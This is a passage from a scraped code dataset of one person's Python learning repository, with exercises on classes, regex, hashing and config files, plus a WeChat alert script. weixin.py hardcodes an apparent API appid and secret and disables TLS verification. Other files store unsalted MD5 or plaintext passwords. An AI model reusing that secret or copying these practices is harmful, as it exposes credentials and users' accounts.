o.echo('开车去东北')\n#\n# print()\n#\n# o.name = '老张'\n# o.age = 40\n# o.sex = '男'\n# o.echo(\"上山去打柴\")\n# o.echo('最爱大保健')\n# o.echo('开车去东北')\n\n# 构造方法\nclass one:\n def __init__(self, name, age, sex):\n \"\"\"\n 构造方法\n \"\"\"\n self.name = name\n self.age = age\n self.sex = sex\n\n def echo(self, info):\n print(\"%s, %s, %s, %s\" % (self.name, self.age, self.sex, info))\n\n\nxm = one(\"小明\", 19, '男')\nlz = one(\"老张\", 40, '女')\n\nxm.echo(\"上山去打柴\")\nxm.echo('最爱大保健')\nxm.echo('开车去东北')\nprint()\nlz.echo(\"上山去打柴\")\nlz.echo('最爱大保健')\nlz.echo('开车去东北')\n" }, { "alpha_fraction": 0.4888888895511627, "alphanum_fraction": 0.5365079641342163, "avg_line_length": 9.862069129943848, "blob_id": "a31054aecd71fc677c24e53c36ef460a7aa4fbdd", "content_id": "89edfe118368decdddc1b3a0ff94775776be6467", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 331, "license_type": "no_license", "max_line_length": 26, "num_lines": 29, "path": "/python学习/面向对象学习/s2.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-04-02\n\n__author__ = '@jiawenlong'\n\nName = 'jiawenlong'\n\n\ndef func():\n return 'func'\n\n\nclass Foo:\n def __init__(self):\n self.name = '123'\n\n\ndef f1():\n return '首页'\n\n\ndef f2():\n return '新闻'\n\n\ndef f3():\n return '精华'\n" }, { "alpha_fraction": 0.508474588394165, "alphanum_fraction": 0.6101694703102112, "avg_line_length": 18.83333396911621, "blob_id": "fc3b92cb40dc597b2dee7b20f0da6b7f2d21fd5a", "content_id": "31a9ac2ffa642db6f417ad4f8729e856b1f748f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 122, "license_type": "no_license", "max_line_length": 25, "num_lines": 6, "path": "/python学习/模块/__init__.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2019/8/10 11:11\n\n__author__ = 'JiaWenLong'" }, { "alpha_fraction": 0.5468424558639526, "alphanum_fraction": 0.5752949118614197, "avg_line_length": 19.884057998657227, "blob_id": "36c9882b0ac37f07c01a945ac0a0d9b05822bd1c", "content_id": "baf33b10201a28c69fec41f05a46d710139de1bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1737, "license_type": "no_license", "max_line_length": 82, "num_lines": 69, "path": "/python学习/模块/明文加密模块hashlib.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-07\n\n__author__ = '@jiawenlong'\n\nimport hashlib\n\ndb = {\n 'username': '2c9d18ba9ed23b6da92e6ec471d1805b', # jiawenlong\n 'pass': 'e10adc3949ba59abbe56e057f20f883e' # 123456\n}\n\n\n# h = hashlib.md5()\n# h.update('jiawenlong')\n# h.update('123456')\n# print \"mima:\", h.hexdigest()\n\n# h.update('123456'.encode('utf8')) ### python3 中必须对字符串进行转换\n# python3 字符串是以unicode方式存在内存的,需要encode转换为字节类型\n\n\ndef get_md5(s):\n hashs = hashlib.md5()\n hashs.update(s.encode('utf8'))\n return hashs.hexdigest()\n\n\n# def login(user, password):\n#\n# '''以下这种加密方式是在用户名的基础上,又对密码进行加密'''\n#\n# print \"密码:\", password\n# hash = hashlib.md5()\n# hash.update(user)\n# user = hash.hexdigest()\n# print\n# hash.update(password)\n# password = hash.hexdigest()\n# print \"密码:\", password\n# if user == db['username']:\n# if password == db['pass']:\n# print \"登陆成功\"\n# else:\n# print \"用户名或密码错误\"\n# else:\n# print \"用户名或密码错误\"\n\n\ndef login(username, password):\n \"\"\"函数调用加密,是分别加密,和上面的方式得到的密码是不同的\"\"\"\n user = get_md5(username)\n print()\n password = get_md5(password)\n if user == db['username']:\n if password == db['pass']:\n print(\"登陆成功\")\n else:\n print(\"用户名或密码错误\")\n else:\n print(\"用户名或密码错误\")\n\n\nuser = input(\"请输入用户名:_> \")\npaword = input(\"请输入密码:_> \")\n\nlogin(user, paword)\n" }, { "alpha_fraction": 0.5023607015609741, "alphanum_fraction": 0.5288007259368896, "avg_line_length": 16.649999618530273, "blob_id": "5341fdabc7751f0f9066d88497be585ccd9b5157", "content_id": "9c7415b55b8ff4a63cfda70f36273d20259490f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1207, "license_type": "no_license", "max_line_length": 53, "num_lines": 60, "path": "/python学习/面向对象学习/class_metaclass_类祖宗.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-28\n\n__author__ = '@jiawenlong'\n\n'''python 一切皆对象'''\n\n# class Foo:\n# def function(self):\n# print(123)\n\n\n\"\"\"以上和下面的写法是相同的,都是声明了一个类\"\"\"\n\n\n#\n# def function(self):\n# print(123)\n#\n#\n# Foo = type('Foo', (object,), {'func': function})\n\n\nclass Mytype(type):\n def __init__(self, *args, **kwargs):\n print(\"遇到 class Foo 执行这个Mytype_init:%s\" % 1)\n\n def __call__(self, *args, **kwargs):\n print(\"遇到 Foo() 执行 这个 Mytype_call: %s\" % 2)\n\n n = self.__new__(self)\n print(\"然后创建对象,调用Foo的__new__创建对象:%s \" % n)\n self.__init__(n)\n\n\n# 下面2行是2.7的写法\n# class Foo(object):\n# __metaclass__ = Mytype\n\nclass Foo(object, metaclass=Mytype):\n def __init__(self):\n print(\"最后执行,Foo_init: %s \" % 4)\n\n def __call__(self, *args, **kwargs):\n print(111)\n\n def function(self):\n print(567)\n\n # obj 是在new中创建\n def __new__(cls, *args, **kwargs):\n return 3\n # return \"对象\" [obj]\n\n\nobj = Foo()\n# obj.function()\n# obj()\n" }, { "alpha_fraction": 0.469613254070282, "alphanum_fraction": 0.6132596731185913, "avg_line_length": 15.477272987365723, "blob_id": "2183597d15fa432cdb5a6f667ba55e410b6ab8df", "content_id": "30ebd5c4292771218a580c4c8cc4f2c1b08dd3be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 728, "license_type": "no_license", "max_line_length": 102, "num_lines": 44, "path": "/python学习/面向对象学习/class_作业/bin/teacher.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-04-08\n\n__author__ = '@jiawenlong'\n\n\n# import json\n# import os\n# import sys\n# sys.path.append('..')\n# # Conf_path = sys.path\n# from lianxi import *\n\n\n\ndef digitalSum(n):\n if n == 0:\n return n\n return digitalSum(n//10) + n%10\n\n# print(digitalSum(19))\n\ndef digitalRoot(n):\n return digitalSum(digitalSum(digitalSum(digitalSum(n))))\n\n\n# print(digitalRoot(99909876541234556789098734567896543678909999999912345678901999123456789099999999))\n\n\ndef hailstone(n):\n if n % 2 == 0:\n print(n)\n hailstone(n//2)\n if n == 1:\n print(n)\n exit()\n else:\n print(n)\n hailstone(3*n+1)\n\n\nhailstone(15)" }, { "alpha_fraction": 0.5089163184165955, "alphanum_fraction": 0.5190672278404236, "avg_line_length": 30.973684310913086, "blob_id": "f620da0c8dac0a3dbb479fb42e7d03f829a2b79e", "content_id": "1a33bca70f4f1234b3c47f492755c471332a8980", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3715, "license_type": "no_license", "max_line_length": 102, "num_lines": 114, "path": "/未定义项目练习/all-report.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport xlrd\nimport datetime as dt\nimport os\nimport glob\nimport markdown\n\n# def create_md():\n# DT = dt.date.today().strftime('%Y-%m-%d')\n# file_name = \"/Users/admin/Documents/work/日报-周报/运维日报(\" + DT + \"-贾文龙).xlsx\"\n# md_file = \"/Users/admin/Documents/work/shells/rb.md\"\n#\n# rb = open(md_file, 'w')\n# book = xlrd.open_workbook(file_name)\n# sh = book.sheet_by_index(0)\n#\n# for hang in range(0, sh.nrows):\n# if hang == 0 or hang == 1:\n# continue\n# for lie in range(0, sh.ncols):\n# if sh.cell_value(rowx=hang, colx=lie):\n# value = sh.cell_value(hang, lie)\n# if lie == 5:\n# rb.write(\"|\" + '\\n')\n# if hang == 2 and lie == 5: rb.write(\"|--|--|--|--|--|\" + '\\n')\n# else:\n# rb.write(\"|\")\n# rb.write(value.encode(\"utf-8\"))\n#\n#\n#\n# def markdown2html():\n# SOURCE_FILES_PATH = os.path.join(\"/Users/admin/Documents/work/shells/\", \"rb.md\")\n# SOURCE_FILES = glob.glob(SOURCE_FILES_PATH)\n#\n# for pos in range(0, len(SOURCE_FILES)):\n# file_base_name = os.path.basename(SOURCE_FILES[pos])\n# file_name = file_base_name.replace(\".md\", \"\")\n# output_files_path = os.path.join(\"/Users/admin/Documents/work/shells/\", file_name + \".html\")\n#\n# markdown.markdownFromFile(\n# input=SOURCE_FILES[pos],\n# output=output_files_path,\n# encoding=\"utf-8\",\n# extensions=[\n# 'markdown.extensions.fenced_code',\n# 'markdown.extensions.tables'\n# ],\n# output_format=\"html5\"\n# )\n\n\nexcel_path = \"/Users/admin/Documents/work/日报-周报/\"\nMD_PATH=\"/Users/admin/Documents/work/shells/\"\nmd_name = \"rb.md\"\ncss = \"\"\"\n<style type=\"text/css\">\ntable,th,td { border:1px solid blue; }\nth { background-color:#98bf21; color:white; }\n#td { background-color:#98bf21; color:white; }\n</style>\"\"\"\n\ndef create_md():\n DT = dt.date.today().strftime('%Y-%m-%d')\n file_name = excel_path + \"运维日报(\" + DT + \"-贾文龙).xlsx\"\n md_file = MD_PATH + md_name\n if not os.path.isfile(file_name):\n print \"没有 \" + file_name + \" 这个文件!!\\n请检查!!!\"\n exit()\n rb = open(md_file, 'w')\n book = xlrd.open_workbook(file_name)\n sh = book.sheet_by_index(0)\n rb.write(css)\n for hang in range(0, sh.nrows):\n if hang == 0 or hang == 1:\n continue\n for lie in range(0, sh.ncols):\n if sh.cell_value(rowx=hang, colx=lie):\n value = sh.cell_value(hang, lie)\n else:\n value = \"-\"\n if lie == 5:\n rb.write(\"|\" + '\\n')\n if hang == 2 and lie == 5: rb.write(\"|--|--|--|--|--|\" + '\\n')\n else:\n rb.write(\"|\")\n rb.write(value.encode(\"utf-8\"))\n rb.closed\n\n\ndef markdown2html():\n SOURCE_FILES_PATH = os.path.join(MD_PATH, \"*.md\")\n SOURCE_FILES = glob.glob(SOURCE_FILES_PATH)\n for pos in range(0, len(SOURCE_FILES)):\n file_base_name = os.path.basename(SOURCE_FILES[pos])\n file_name = file_base_name.replace(\".md\", \"\")\n output_files_path = os.path.join(MD_PATH, file_name + \".html\")\n markdown.markdownFromFile(\n input=SOURCE_FILES[pos],\n output=output_files_path,\n encoding=\"utf-8\",\n extensions=[\n 'markdown.extensions.fenced_code',\n 'markdown.extensions.tables'\n ],\n output_format=\"html5\"\n )\n\nif __name__ == \"__main__\":\n create_md()\n markdown2html()\n" }, { "alpha_fraction": 0.6079136729240417, "alphanum_fraction": 0.6312949657440186, "avg_line_length": 21.849315643310547, "blob_id": "0b85ba038228785ab4ea19bbbedfedcd4c32ecfa", "content_id": "b6a99158ee6cd88258c47ac8163780847605073a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1864, "license_type": "no_license", "max_line_length": 72, "num_lines": 73, "path": "/python学习/模块/配置模块_configParser.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-09\n\n__author__ = '@jia wen long'\n\nimport configparser\n\nconfig = configparser.ConfigParser()\n\n# 配置DEFAULT模块\nconfig[\"DEFAULT\"] = {\n 'ServerAliveInterval': '45',\n 'Compression': 'yes',\n 'CompressionLevel': '9'\n}\n\n# 给 DEFAULT 添加一个配置\nconfig['DEFAULT']['ForwardX11'] = 'yes'\n\n# 也可以这样写\nconfig['www.myconfigParser.com'] = {}\ntopsecret = config['www.myconfigParser.com']\ntopsecret['Port'] = '10086'\ntopsecret['ForwardX11'] = 'yes'\n\n# 写入到文件\nwith open('example.ini', 'w') as configfile:\n config.write(configfile)\n\n\n\n\n# import ConfigParser # python2\n#\n# config = ConfigParser.ConfigParser() # 创建配置文件对象,即配置文件文件描述符\n#\n# # python2 的写法\n# fp = 'example.ini'\n# config.read(fp) # 打开conf\n#\n# # config.add_section('Section1') #添加conf节点\n# # config.set('Section1', 'name', 'jack') #添加值\n# # config.set('Section1', 'age', '23')\n# # config.set('Section1', 'worker', 'CEO')\n# # config.add_section('Section2') #添加conf节点\n# # config.set('Section2', 'name', 'rose') #添加值\n# # config.set('Section2', 'age', '21')\n# # config.set('Section2', 'worker', 'CCC')\n# # # with open(fp, 'w') as fw: #循环写入\n# # # config.write(fw)\n#\n# # 读取\n# name = config.get('Section1', 'name')\n# age = config.get('Section1', 'age')\n# print(\"name: %s \\nage: %s\" % (name, age))\n\n\n# import os\n# import sys\n\n# base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n# print os.path.abspath(__file__)\n# print os.path.dirname(os.path.abspath(__file__))\n# print base_dir\n\n\n# +++++++++\n# import confiParser # python3\n# 以下是 python3 的写法\n# config = configParser.ConfigParser() # 创建配置文件对象,即配置文件文件描述符\n# 可以这样写\n" }, { "alpha_fraction": 0.5410062074661255, "alphanum_fraction": 0.5658167004585266, "avg_line_length": 18.608108520507812, "blob_id": "2fc995baa5c6b940d2b3d87a1457230dc8175d0b", "content_id": "ea0df1fc7a2528ba399a37182a5d2d78bd68d27a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1467, "license_type": "no_license", "max_line_length": 80, "num_lines": 74, "path": "/回文.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-08-25\n\n\ndef s_revers(s):\n if s == s[::-1]:\n return True\n else:\n return False\n\n\ndef list_resvers(s):\n l = list(s)\n l.reverse()\n # print(l)\n ns = ''.join(l)\n if s == ns:\n print('yes,True')\n else:\n print('no,False')\n\na = input('请输入字符串> ')\n# print(s_revers(a))\nlist_resvers(a)\n\n# string = 'abcdef'\n#\n#\n# def string_reverse1(string):\n# return string[::-1]\n#\n#\n# def string_reverse2(string):\n# t = list(string)\n# l = len(t)\n# for i, j in zip(range(l - 1, 0, -1), range(l // 2)):\n# t[i], t[j] = t[j], t[i]\n# return \"\".join(t)\n#\n#\n# def string_reverse3(string):\n# if len(string) <= 1:\n# return string\n# return string_reverse3(string[1:]) + string[0]\n#\n#\n# from collections import deque\n#\n#\n# def string_reverse4(string):\n# d = deque()\n# d.extendleft(string)\n# return ''.join(d)\n#\n#\n# def string_reverse5(string):\n# # return ''.join(string[len(string) - i] for i in range(1, len(string)+1))\n# return ''.join(string[i] for i in range(len(string) - 1, -1, -1))\n#\n\n# def reverse(str):\n# alist = list(str)\n# alist.reverse()\n# new_str = ''.join(alist)\n# return new_str\n# print reverse('jb51.net')\n#\n# print(string_reverse1(string))\n# print(string_reverse2(string))\n# print(string_reverse3(string))\n# print(string_reverse4(string))\n# print(string_reverse5(string))\n" }, { "alpha_fraction": 0.42540493607521057, "alphanum_fraction": 0.4893435537815094, "avg_line_length": 17.919355392456055, "blob_id": "6568e68d73aaa1f6b923b01c432153f1cfb14094", "content_id": "10ec951e06504fe838f9b80664cd3a7fd380c30a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1185, "license_type": "no_license", "max_line_length": 54, "num_lines": 62, "path": "/未定义项目练习/GetBAsic.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\ndef getBASIC():\n loop = []\n while True:\n print(\"请输入参数:\")\n S = input()\n if S.endswith('END'):\n loop.append(S)\n break\n else:\n loop.append(S)\n return loop\n\n\ndef findLine(prog, target):\n for i in range(0, len(prog)):\n if prog[i].startswith(target):\n return i\n\n\ndef execute(prog):\n location = 0\n args = []\n while True:\n if location == len(prog) - 1: return \"success\"\n T = prog[location].split()[0]\n location = findLine(prog, T)\n T = prog[location].split()[-1]\n location = findLine(prog, T)\n args.append('loop')\n if len(args) >= len(prog):\n return \"infinite loop\"\n\n\nprint(execute(getBASIC()))\n# (\"\\n\"\n# \"10 GOTO 21\\n\"\n# \"21 GOTO 37\\n\"\n# \"37 GOTO 21\\n\"\n# \"40 END\\n\"\n# \"\\n\"\n# \"5 GOTO 30\\n\"\n# \"10 GOTO 20\\n\"\n# \"20 GOTO 10\\n\"\n# \"30 GOTO 40\\n\"\n# \"40 END\\n\"\n# \"\\n\"\n# \"10 GOTO 20\\n\"\n# \"20 END\\n\"\n# \"\\n\"\n# \"4 GOTO 12\\n\"\n# \"12 GOTO 99\\n\"\n# \"22 GOTO 22\\n\"\n# \"99 GOTO 12\\n\"\n# \"200 END\\n\"\n# \"\\n\"\n# \"10 GOTO 40\\n\"\n# \"20 GOTO 25\\n\"\n# \"25 GOTO 20\\n\"\n# \"40 END\\n\")\n" }, { "alpha_fraction": 0.557073175907135, "alphanum_fraction": 0.5661788582801819, "avg_line_length": 32.434783935546875, "blob_id": "f940fc2fe12850909d3062a990699fb27132d30f", "content_id": "350ab8695f9ee9d7c9e6adc088a587dc77137125", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3693, "license_type": "no_license", "max_line_length": 116, "num_lines": 92, "path": "/python学习/面向对象学习/class_作业/bin/student.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-04-08\n\n__author__ = '@jiawenlong'\n\nimport json\nimport os\nimport sys\nsys.path.append('..')\n# Conf_path = sys.path\nfrom lianxi import *\n\nschool_course = {\n 'python': {\n 'period': 14,\n 'price': 2000,\n 'city': '北京'\n },\n 'linux': {\n 'period': 18,\n 'price': 2500,\n 'city': '北京'\n },\n 'go': {\n 'period': 20,\n 'price': 3000,\n 'city': '上海'\n }\n}\n\nprint('欢迎来到 坑死你 学校,这里你可以选择要学习的课程')\nprint('目前我们开设了3门课程,python、linux、go')\nprint('他们分别在 北京和上海开课,详细信息请查询')\n\nwhile True:\n student_course = input('\\n请输入你要学的的课程可以查看详细信息:')\n\n # print(school_course[student_course]['period'])\n if student_course != 'python' and student_course != 'go' and student_course != 'linux':\n print('抱歉,我们学校没有您要查询的课程,请重新选择')\n continue\n # 课程\n course = Course(student_course, school_course[student_course]['period'], school_course[student_course]['price'],\n school_course[student_course]['city'])\n print('以下是 %s 课程的详细信息:\\n学习地址:%s\\n课程名称: %s\\n周期: %s周\\n价格[人民币]: %s' %\n (course.name, course.school, course.name, course.cycle, course.price))\n goon = input('是否继续查询[y/n]:')\n if goon == 'y' or goon == 'Y':\n continue\n else:\n break\n\nregister = input('\\n是否现在注册[y/n]:')\nif register == 'y' or register == 'Y':\n student_name = input('请输入你的名字:')\n student_pwd = input('请输入您的密码:')\n student_phone = input('请输入您的手机号:')\n student_course = input('请输入要学习的课程: ')\n # 学生注册\n course = Course(student_course, school_course[student_course]['period'], school_course[student_course]['price'],\n school_course[student_course]['city'])\n student_one = Student(student_name, student_phone, course)\n print('你的名字是:%s, 手机号: %s \\n\\n你所选的课程的详细信息:\\n学习地址:%s\\n课程名称: %s\\n周期: %s周\\n价格[人民币]: %s'\n % (student_name, student_phone, course.school, course.name, course.cycle, course.price))\n register = input('\\n是否现在付款[y/n]:')\n if register == 'Y' or register == 'y':\n money = int(input('请支付:'))\n ret = student_one.pay(money)\n print('您的付款 %s ,我们已经收到,后续会有专员跟您联系,感谢选择坑死你学校进行培训!' % ret)\n # print(School.payment)\n # 信息记录\n # student_info = open(student_name + '.info', 'a')\n json = json.dumps({'name': student_name, 'passwd': student_pwd, 'phone': student_phone,\n 'course': student_course, 'payment': 'yes', 'city': course.school})\n with open(student_name + '.json', 'w') as student_info:\n student_info.write(json)\n else:\n exit()\nelse:\n name = input('请输入登陆名: ')\n pswd = input('请输入密码:')\n if os.path.exists(name + '.json'):\n with open(name + '.json', 'r') as f:\n student = json.load(f)\n # print(student)\n if name == student['name'] and pswd == student['passwd']:\n print('\\n您选的课程是: %s\\n地址在: %s\\n是否付款:%s' % (student['course'], student['city'], student['payment']))\n exit()\n else:\n print('\\n用户名密码错误')" }, { "alpha_fraction": 0.6152178049087524, "alphanum_fraction": 0.6260595321655273, "avg_line_length": 33.283782958984375, "blob_id": "8f351fbbe3c0e677d24d028932427156b87cef99", "content_id": "97a2787960065661524ab7ba810985f39fa96d2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5853, "license_type": "no_license", "max_line_length": 136, "num_lines": 148, "path": "/未定义项目练习/weixin.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n# author: yangrong\n# date: 2015-8-19\n# 本微信报警脚本应用于企业订阅号\n# 当用户主动发消息给公众号的时候(包括发送信息、点击自定义菜单、订阅事件、扫描二维\n# 码事件、支付成功事件、用户维权),微信将会把消息数据推送给开发者,开发者在一段时\n# 间内(目前修改为48小时)可以调用客服消息接口,通过POST一个JSON数据包来发送\n# 消息给普通用户,在48小时内不限制发送次数。\n\n\n\nimport os\nimport urllib2\nimport requests\nimport sys\nimport time\nimport json\nimport pickle\n\nappid = 'wx74fa57ee83c7338e'\nsecret = 'a31623dfc4c7408fc832f8073c0f6324'\ntoken_file = '/tmp/token_file.txt'\nlog_file = '/tmp/wechat.log'\nopenid_user_file = '/tmp/openid_user.txt'\nopenid_list = [\"oQe1a0mz0fbLZwfYhPhZ0t4H3S6w\" # jwl\n ] # 这是微信接收者的openid\n\n# 报警格式,脚本名 收件人 标题 内容\n# 这是zabbix发送内容格式,所以\n# 这里取出标题和内容就行了\n\n# 帮助信息,要求必须传参4个\nif len(sys.argv) != 4:\n print 'Usage: %s mail-to title content' % sys.argv[0]\n print 'Example: '\n print ' %s [email protected] \"this is testtitle\" \"this is test content.\"' % sys.argv[0]\n sys.exit()\n\ntitle = sys.argv[2]\ncontent = sys.argv[3]\ncurrent_hour = time.strftime('%H', time.localtime(time.time()))\n\n\n# 日志记录函数,把标题,用户id,状态记录\ndef log(title, openid, status):\n with open(log_file, 'ab') as f:\n current_time = time.strftime('%Y-%m-%d%H:%M:%S', time.localtime(time.time()))\n f.write('%s| %s | %s | %s\\n' % (current_time, openid, status, title))\n\n\n# 获取token\nclass Token(object):\n def __init__(self, appid, secret):\n self.baseurl = 'https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={0}&secret={1}'.format(appid, secret)\n self.expire_time = sys.maxint\n\n def get_token(self):\n if self.expire_time > time.time():\n request = urllib2.Request(self.baseurl)\n response = urllib2.urlopen(request)\n ret = response.read().strip()\n ret = json.loads(ret)\n if 'errcode' in ret.keys():\n print >> ret['errmsg'], sys.stderr\n sys.exit(1)\n self.expire_time = time.time() + ret['expires_in']\n self.access_token = ret['access_token']\n token_pre = [current_hour, self.access_token]\n with open(token_file, 'wb') as f:\n pickle.dump(token_pre, f)\n return self.access_token\n\n\n# access_token = Token(appid=appid,secret=secret).get_token() #这是获取access_token的代码\n# print access_token\n\n\n# 获取所有的openid,然后根据openid获取用户信息,提取出用户名,最后输出用户名与openid的对应关系。\nclass get_user():\n def __init__(self):\n self.access_token = Token(appid, secret).get_token()\n\n\n def get_openid_list(self):\n openid_list_url = 'https://api.weixin.qq.com/cgi-bin/user/get?access_token={0}&next_openid='.format(self.access_token)\n request = urllib2.Request(openid_list_url)\n response = urllib2.urlopen(request)\n ret = response.read().strip()\n openid_list = json.loads(ret)\n # printopenid_list['data']['openid']\n openid_list = openid_list['data']['openid']\n for openid in openid_list:\n user_info_url = 'https://api.weixin.qq.com/cgi-bin/user/info?access_token={0}&openid={1}'.format(self.access_token, openid)\n user_info_request = urllib2.Request(user_info_url)\n user_info_response = urllib2.urlopen(user_info_request).read().strip()\n user_info = json.loads(user_info_response)\n if 'errcode' in user_info.keys():\n print>> user_info['errmsg'], sys.stderr\n sys.exit()\n with open(openid_user_file, 'wb') as f:\n f.write('openid:%s nickname:%s' % (openid, user_info['nickname']))\n\n\n# 使用post方式发送报警\ndef send_msg(title, content):\n # 一天能够获取的access_token次数是2000次,每次取到的token有效时间2小时,所以pickle dump时,把当前小时数与access_token写入文件,每一小时获取一次token.\n current_hour = time.strftime('%H', time.localtime(time.time()))\n if not os.path.exists(token_file):\n access_token = Token(appid, secret).get_token()\n with open(token_file, 'rb') as f:\n token_pre = pickle.load(f)\n # print'token_pre:',token_pre\n access_token_pre = token_pre[1]\n current_hour_pre = token_pre[0]\n if current_hour == current_hour_pre:\n access_token = access_token_pre\n else:\n access_token = Token(appid, secret).get_token()\n # print'access_token:',access_token\n # 循环openid_list,给每个成员单独推送微信消息\n for openid in openid_list:\n # print'openid:',openid\n url = 'https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=%s' % access_token\n payload = {\n \"touser\": '%s' % openid,\n \"msgtype\": \"text\",\n \"text\": {\n \"content\": \"Title: %s\\nContent:%s\" % (title, content)\n }\n }\n ret = requests.post(url, data=json.dumps(payload, ensure_ascii=False), verify=False)\n result = ret.json()\n\n # printresult\n # 如果这一次发送失败,则代表可能access_token有问题,删除pickle dump文件,重新生成一次access_token\n if result['errcode']:\n log(title, openid, 'sendfail')\n os.remove(token_file)\n access_token = Token(appid, secret).get_token()\n else:\n log(title, openid, 'sendsuccess')\n\n # printpost(url, data)\n\n# get_user().get_openid_list() #这是遍历所有openid,获取openid和用户名的对应关系。\n\nsend_msg(title, content) # 发送微信信息" }, { "alpha_fraction": 0.6293103694915771, "alphanum_fraction": 0.6508620977401733, "avg_line_length": 14.399999618530273, "blob_id": "6887cdd653a2fda5f0e3e92d76a35a9d73539f05", "content_id": "cb3a11dc85ef6088ed8ef2adbdbebd4debee57c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 288, "license_type": "no_license", "max_line_length": 53, "num_lines": 15, "path": "/git_push.sh", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\n[ $# -ne 1 ] && echo \"Usage : sh $0 message \" && exit\nmessage=$1\necho \"添加文件到本地仓库\"\ngit add .\nsleep 2\n\necho \"提交文件到本地仓库\"\ngit commit -m \"$message\" &>/dev/null\nsleep 2\n\necho \"提交文件到远程仓库,github\"\ngit push origin master\n\n" }, { "alpha_fraction": 0.5550122261047363, "alphanum_fraction": 0.6202118992805481, "avg_line_length": 27.546510696411133, "blob_id": "c3ae868e3181e255860521f7083d6dbbecc823a2", "content_id": "a04a87745de44aab4e695713a19e31530133bd80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2992, "license_type": "no_license", "max_line_length": 102, "num_lines": 86, "path": "/python学习/模块/re_正则模块.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2019/11/4 21:05\n\n__author__ = 'JiaWenLong'\n\nimport re\n\n# findall 取出全部匹配到的字符\n# findall 第一个参数是规则,第二个参数是匹配的字符串。2个参数都必须是字符串\nprint(re.findall('w*', 'hell world'))\nprint(re.findall('a[a,d ,c]', 'ad x'))\nprint(re.findall('[^4,5]', 'iu124i5,'))\nprint(re.findall('[^45]', 'iu124i5,'))\nprint(re.findall('u.n', r'iu\\n124i5,'))\nprint(re.findall('u.n', 'iu\\n124i5,'))\n\nprint('反斜杠的意义')\n# \\d 匹配是兼职数字,任意一个\n# \\D 匹配任意非数字\n# \\s 匹配任意空白字符\n# \\S 匹配任意非空白字符\n# \\w 匹配任意字母数字字符\n# \\W 匹配任意非字母数字字符\n# \\b 匹配一个单词边界,即单词和空格的位置\nprint(re.findall('\\d', 'iu124i5,'))\nprint(re.findall('\\d{2}', 'iu124i567,'))\nprint(re.findall('\\d{2,3}', 'iu124i567,'))\nprint(re.findall('\\D', 'iu12\\s4i\\n5$67,'))\nprint(re.findall('\\s', 'iu 12%4i\\t5$67,'))\nprint(re.findall('\\S', 'iu 12 4i \\t567,'))\nprint(re.findall('w\\w{2}l', 'hell wo0ld'))\nprint(re.findall('\\W', 'hell w$o0%l\\d!@#$&*(\\p'))\nprint(re.findall(r'l\\b', 'hell&wo0l$d'))\n\n####################\nprint('re.search 匹配到第一个后结束')\nprint(re.search('[1-9]+', 'iu123abcheloword1234').group())\nprint(re.search(r\"\\\\p\", 'iu123abcheloword1234\\p').group())\nprint(re.search(\"\\.\", 'iu123abcheloword.123.4\\p').group())\n\nprint('反斜杠的转译')\nprint(re.findall(\"\\\\\\\\\", \"abc\\ed\"))\nprint(re.findall(r\"\\\\\", \"abc\\ed\"))\nprint(re.findall(r\"\\bbelo\", \"belo\"))\nprint(re.findall(\"\\\\bbelo\", \"belo\"))\n\n# 分组 + [1,OO)| ? [0,1]\nprint('分组')\nprint(re.search('(as)+', 'adasfdks').group())\nprint(re.findall('(as)?', 'adafaadksa'))\nprint(re.findall('(as)+', 'adafaasdkasa'))\n\n# 通过组名取字段 格式 